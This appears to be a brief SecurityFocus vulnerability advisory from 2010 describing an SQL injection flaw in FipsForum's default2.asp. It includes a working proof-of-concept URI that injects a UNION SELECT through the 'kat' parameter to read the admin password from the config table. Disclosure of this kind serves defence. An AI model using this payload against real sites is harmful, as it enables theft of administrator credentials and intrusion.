FipsForum Default2.ASP SQL Injection Vulnerability

An attacker can exploit these issues via a web client.

The following proof-of-concept URI is available:

http://www.example.com//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config


 

Privacy Statement
Copyright 2010, SecurityFocus